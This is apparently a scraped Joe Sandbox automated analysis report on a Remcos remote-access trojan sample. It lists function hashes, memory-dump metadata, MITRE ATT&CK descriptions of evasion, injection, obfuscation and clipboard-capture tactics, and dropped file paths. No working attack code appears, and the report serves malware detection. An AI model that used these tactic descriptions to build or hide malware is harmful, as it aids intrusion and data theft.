Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d67e1cc3c7ed351efa8481a57c7b58be6e09f1ad5fe24d2001f7bc2aa0986b50
Instruction ID: a0074a716285c780366ab83ee7f302e635cd51ccfdc0110afefea364eecffb01
Opcode Fuzzy Hash: d67e1cc3c7ed351efa8481a57c7b58be6e09f1ad5fe24d2001f7bc2aa0986b50
Instruction Fuzzy Hash: E6F0B775A001159FCB15CB9CD990AEEF7B1FF88324F208159E515A73A1C736AC52CB50

Uniqueness

Uniqueness Score: -1.00%

Function 074E1D8B Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 074E7418 Relevance: 16.7, Strings: 13, Instructions: 429COMMON

Download Yara Rule

Strings

$^q, xrefs: 074E7936
$^q, xrefs: 074E792A
$^q, xrefs: 074E77AC
tP^q, xrefs: 074E7848
wl, xrefs: 074E796D
4'^q, xrefs: 074E74CE
d5qk, xrefs: 074E7696
4'^q, xrefs: 074E74C2
$^q, xrefs: 074E78FF
4'^q, xrefs: 074E76C5
wl, xrefs: 074E797B
4'^q, xrefs: 074E76CF
tP^q, xrefs: 074E783C

Memory Dump Source

Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$d5qk$tP^q$tP^q$$^q$$^q$$^q$$^q$wl$wl
API String ID: 0-268659279
Opcode ID: 482d4ad68c3554cb954022c864b0e65074ea83a458053ebc5917dbe1a7c2cad7
Instruction ID: c5e0b598810cb84cfc25e5adc778bd71436a890267bd7a7a3d79aacf49a2b574
Opcode Fuzzy Hash: 482d4ad68c3554cb954022c864b0e65074ea83a458053ebc5917dbe1a7c2cad7
Instruction Fuzzy Hash: E9E14BB1B043469FDB268B7898006E7BBAAAFC2332F1484BBD545CF355DA31C845C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 074EE8AD Relevance: 14.0, Strings: 11, Instructions: 290COMMON

Download Yara Rule

Strings

4'^q, xrefs: 074EEBAC
tP^q, xrefs: 074EE9E5
tP^q, xrefs: 074EEAE0
$^q, xrefs: 074EE905
(dq, xrefs: 074EEB3D
tP^q, xrefs: 074EEAD4
tP^q, xrefs: 074EE9D9
(dq, xrefs: 074EEA9A
4'^q, xrefs: 074EEBB8
(dq, xrefs: 074EEAFE
(dq, xrefs: 074EEB08

Memory Dump Source

Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
API String ID: 0-459999756
Opcode ID: c83e7e1fed2828edf28c530a1b5a27ffda246206431a77eb1cb0ca73d99762e0
Instruction ID: 1dbeb53bed53e67957c263c59c3a66654d974c9798de1ebc05942110dcd95205
Opcode Fuzzy Hash: c83e7e1fed2828edf28c530a1b5a27ffda246206431a77eb1cb0ca73d99762e0
Instruction Fuzzy Hash: 67A11AB1B001299FEB14DF64C5406BB7BE6BF85321F14896AE8415F395CB32DD81C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 074E7A28 Relevance: 12.8, Strings: 10, Instructions: 343COMMON

Download Yara Rule

Strings

tP^q, xrefs: 074E7AA5
$^q, xrefs: 074E7A3A
$^q, xrefs: 074E7A6C
$^q, xrefs: 074E7D0E
$^q, xrefs: 074E7A60
wl, xrefs: 074E7B0F
4'^q, xrefs: 074E7C35
wl, xrefs: 074E7B1D
tP^q, xrefs: 074E7AB1
4'^q, xrefs: 074E7C29

Memory Dump Source

Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$wl$wl
API String ID: 0-1202610410
Opcode ID: c6580f3406e0a17e584b7fe0a928b848d95792a709a5a07259b7c1ca64719f61
Instruction ID: 18987ed9c2512cd8e214fc25ae813c930d2f9c0ed41b5d148ce5f76c054263b9
Opcode Fuzzy Hash: c6580f3406e0a17e584b7fe0a928b848d95792a709a5a07259b7c1ca64719f61
Instruction Fuzzy Hash: 1AB13AB17043468FC7269B699800AB7BBE9AFC5232F1488ABD445CF351DB31D986C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 074EE130 Relevance: 9.0, Strings: 7, Instructions: 285COMMON

Download Yara Rule

Strings

4'^q, xrefs: 074EE449
4'^q, xrefs: 074EE283
4'^q, xrefs: 074EE28F
$^q, xrefs: 074EE429
$^q, xrefs: 074EE3E3
4'^q, xrefs: 074EE455
$^q, xrefs: 074EE41D

Memory Dump Source

Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3199432138
Opcode ID: fde5bb43d09bd922aa902c6f25793ae203da0a95b08bbed036a90d9f8598ae8b
Instruction ID: 569a9b02ef553d506cebc0a2319b123fc6dfec74fbea17c401739dd4a3a06428
Opcode Fuzzy Hash: fde5bb43d09bd922aa902c6f25793ae203da0a95b08bbed036a90d9f8598ae8b
Instruction Fuzzy Hash: D49149B1B04226DFEB254E7488006EB7BEAAFC6632F14487BD900CB351DB35C986C761

Uniqueness

Uniqueness Score: -1.00%

Function 074EF32D Relevance: 7.7, Strings: 6, Instructions: 194COMMON

Download Yara Rule

Strings

XRcq, xrefs: 074EF49D
XRcq, xrefs: 074EF369
tP^q, xrefs: 074EF40C
XRcq, xrefs: 074EF4AD
tP^q, xrefs: 074EF418
$^q, xrefs: 074EF385

Memory Dump Source

Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: XRcq$XRcq$XRcq$tP^q$tP^q$$^q
API String ID: 0-1682816917
Opcode ID: f9f78d22a4e786feb91dccd2cce0259f5ec1bf38f85bd7b0ed576b2655487730
Instruction ID: ef1754cf165b85b1fe7dcdd749766faee96829bf41cca63fa1ab51dbbb06a7a1
Opcode Fuzzy Hash: f9f78d22a4e786feb91dccd2cce0259f5ec1bf38f85bd7b0ed576b2655487730
Instruction Fuzzy Hash: FD612B71B40106DFCB649F689500ABBBBE6AFC5321F14C46AE4115F396CB31DD4AC761

Uniqueness

Uniqueness Score: -1.00%

Function 074EB420 Relevance: 6.6, Strings: 5, Instructions: 399COMMON

Download Yara Rule

Strings

x.rk, xrefs: 074EBA73
tLsk, xrefs: 074EB573
-rk, xrefs: 074EBAC1
4'^q, xrefs: 074EB840
4'^q, xrefs: 074EB79C

Memory Dump Source

Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tLsk$x.rk$-rk
API String ID: 0-3635802942
Opcode ID: 3ad95f67bcf8690cbff7e97ff8d3fd71a5f9037b5889f6c0789d034fc3ea4e4c
Instruction ID: 3976faa166ee569aa2b489d928d6732bf310c6fecf9d0c4595f0c587f031f4ad
Opcode Fuzzy Hash: 3ad95f67bcf8690cbff7e97ff8d3fd71a5f9037b5889f6c0789d034fc3ea4e4c
Instruction Fuzzy Hash: 62023DB4A00219DFCB24DB24CA51BDABBB2FF88314F1084A9D5096F795CB31AD85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 074E0470 Relevance: 6.4, Strings: 5, Instructions: 151COMMON

Download Yara Rule

Strings

4'^q, xrefs: 074E056A
4'^q, xrefs: 074E055E
$^q, xrefs: 074E0541
$^q, xrefs: 074E0535
$^q, xrefs: 074E04FC

Memory Dump Source

Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 4bc703eac4efb89ff22985af5e878296ba3c7d9a11a537811e547d2d20669411
Instruction ID: 5a8f795d21abc860f3dc8232f73194664b45280f95a8b2d9f1744da71dd8595d
Opcode Fuzzy Hash: 4bc703eac4efb89ff22985af5e878296ba3c7d9a11a537811e547d2d20669411
Instruction Fuzzy Hash: 07414AB07043069FCB258A3499106FB7BE6AFC1221F24486BD515CF3A1DB75C946C791

Uniqueness

Uniqueness Score: -1.00%

Function 074EDA20 Relevance: 5.5, Strings: 4, Instructions: 484COMMON

Download Yara Rule

Strings

(o^q, xrefs: 074EDE49
(o^q, xrefs: 074EDE59
(o^q, xrefs: 074EDB06
(o^q, xrefs: 074EDB16

Memory Dump Source

Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q
API String ID: 0-1978863864
Opcode ID: 7eeb0cb0776aa01d53ca741d197d536844fd00ddf3207b9b76590ab1c2394327
Instruction ID: 28e45bc8c43071db651c4abec9e41c0193eef318dd6a4f03c55cc4f178eb484b
Opcode Fuzzy Hash: 7eeb0cb0776aa01d53ca741d197d536844fd00ddf3207b9b76590ab1c2394327
Instruction Fuzzy Hash: 45F138B1B04206DFCB258F68D844BEB7BA5EF81322F14886BE4558F391DB35C945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 074E7590 Relevance: 5.2, Strings: 4, Instructions: 196COMMON

Download Yara Rule

Strings

d5qk, xrefs: 074E7696
$^q, xrefs: 074E77AC
4'^q, xrefs: 074E76C5
tP^q, xrefs: 074E783C

Memory Dump Source

Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$d5qk$tP^q$$^q
API String ID: 0-3798348130
Opcode ID: 998ccf4c6e4221f6d179b9e473ee880c917bd524864e778bfd75b2a72d957338
Instruction ID: 8872bdb49b47dedef70d1b43526691bb02c3946f749ba015b5c19cd6e40cd347
Opcode Fuzzy Hash: 998ccf4c6e4221f6d179b9e473ee880c917bd524864e778bfd75b2a72d957338
Instruction Fuzzy Hash: 0A6148F0A043479FCB228B688940BE7BBAAAF81336F1884BBD5049F351D731D845C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 074E9648 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 074E9676
$^q, xrefs: 074E96A4
$^q, xrefs: 074E96B0
$^q, xrefs: 074E965A

Memory Dump Source

Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: ec442d86fcc5819896dcbcdcb869f72593f040c3f554c371c2afea027048cb17
Instruction ID: 7b8b6d1a8f5cfb1108afb0df8b9e271e8893e472eecac116ba607d78e25660ea
Opcode Fuzzy Hash: ec442d86fcc5819896dcbcdcb869f72593f040c3f554c371c2afea027048cb17
Instruction Fuzzy Hash: F9213AF1310206ABD734197D5900BA776DE5BC1726F24883BA405CF3C5DD75E845C262

Uniqueness

Uniqueness Score: -1.00%

Function 074E7A07 Relevance: 5.1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

Strings

tP^q, xrefs: 074E7AA5
$^q, xrefs: 074E7A3A
$^q, xrefs: 074E7A6C
$^q, xrefs: 074E7A60

Memory Dump Source

Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$$^q$$^q$$^q
API String ID: 0-3061638629
Opcode ID: fa93091c60539a3b26f24b05605cca020dee125516c26fa5e0b844ab4cabddd6
Instruction ID: 8571a043843f89c5c9f00ec06c11e7544751f252649781614cafbd589e35679e
Opcode Fuzzy Hash: fa93091c60539a3b26f24b05605cca020dee125516c26fa5e0b844ab4cabddd6
Instruction Fuzzy Hash: 632123B26043568FC71A8F248804AA6BBF9AF82732B19459BE404CF362D735CE45C760

Uniqueness

Uniqueness Score: -1.00%

Function 074EAA7B Relevance: 5.1, Strings: 4, Instructions: 80COMMON

Download Yara Rule

Strings

$^q, xrefs: 074EAB0B
$^q, xrefs: 074EAB4F
$^q, xrefs: 074EAAEF
$^q, xrefs: 074EAB33

Memory Dump Source

Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: f50060a6c80f203cb58d789a6d59e7e74059f1363df872dafc4c4333df139113
Instruction ID: 1843404e4c820711c0e97149dbba274763d7cdf5a37eaac6f6d4339888d5d0b3
Opcode Fuzzy Hash: f50060a6c80f203cb58d789a6d59e7e74059f1363df872dafc4c4333df139113
Instruction Fuzzy Hash: 0C21F7B5B043068FCB358E1499445F7BBFAAF41236F18C4ABC9448B301D735C589C792

Uniqueness

Uniqueness Score: -1.00%

Function 074E0308 Relevance: 5.1, Strings: 4, Instructions: 51COMMON

Download Yara Rule

Strings

4'^q, xrefs: 074E0373
$^q, xrefs: 074E035E
4'^q, xrefs: 074E037F
$^q, xrefs: 074E0352

Memory Dump Source

Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 62409de4b48ca111d756b86bd53d320e364d4895828ac90504ffcfd2a971966f
Instruction ID: 19425190aaf91504820f154d373345c5f31b67e999d2e57b0281c5e152e38d22
Opcode Fuzzy Hash: 62409de4b48ca111d756b86bd53d320e364d4895828ac90504ffcfd2a971966f
Instruction Fuzzy Hash: 0E01B170A093964FC32B062859205667FF6AF8366172908EBD440CF3AACA658D4D83A3

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wab.exePID: 3844, Parent PID: 6636COMMON

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	100%
Total number of Nodes:	4
Total number of Limit Nodes:	0

Executed Functions

Function 0583D53D Relevance: 3.1, APIs: 2, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000005), ref: 0583D5A0

Memory Dump Source

Source File: 00000007.00000002.2920719514.0000000005439000.00000040.00000400.00020000.00000000.sdmp, Offset: 05439000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5439000_wab.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a55391a0987836cc8e7f0e5d8f7376e03ccb3f2c00ef3e66adce6014a78a78f8
Instruction ID: 6f9703c99cc9fd5a253a76a3451c02d1b41800ba70d823f642ae5313bf08c88b
Opcode Fuzzy Hash: a55391a0987836cc8e7f0e5d8f7376e03ccb3f2c00ef3e66adce6014a78a78f8
Instruction Fuzzy Hash: 091127B1A413009FE7019F34C89DB8677B4BF253A9F458248EC458F1A6E374C884CF91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Q20240425 MAX5073626.com.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Edderduns.Ama

C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Interrelatedness\Opsparingsformelen\jezebelian.san

C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe

C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe:Zone.Identifier

C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\neglectable.sin

C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Piff\cirkelen.txt

C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Piff\dugvaade.god

C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojk5wowp.0uc.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_orrq3qcc.xgx.psm1

Static File Info

General

Windows Analysis Report
Q20240425 MAX5073626.com.exe

Function 004036D7 Relevance: 86.2, APIs: 31, Strings: 18, Instructions: 444
stringfilecomCOMMON

Function 00404B65 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 295
windowclipboardmemoryCOMMON

Function 0040673F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155
filestringCOMMON

Function 00404FC7 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374
windowstringCOMMON

Function 00405A73 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 225
stringregistryCOMMON

Function 0040154A Relevance: 33.7, APIs: 17, Strings: 2, Instructions: 441
stringtimesleepCOMMON

Function 004033C8 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 178
memoryCOMMON

Function 00405ECE Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 216
stringCOMMON

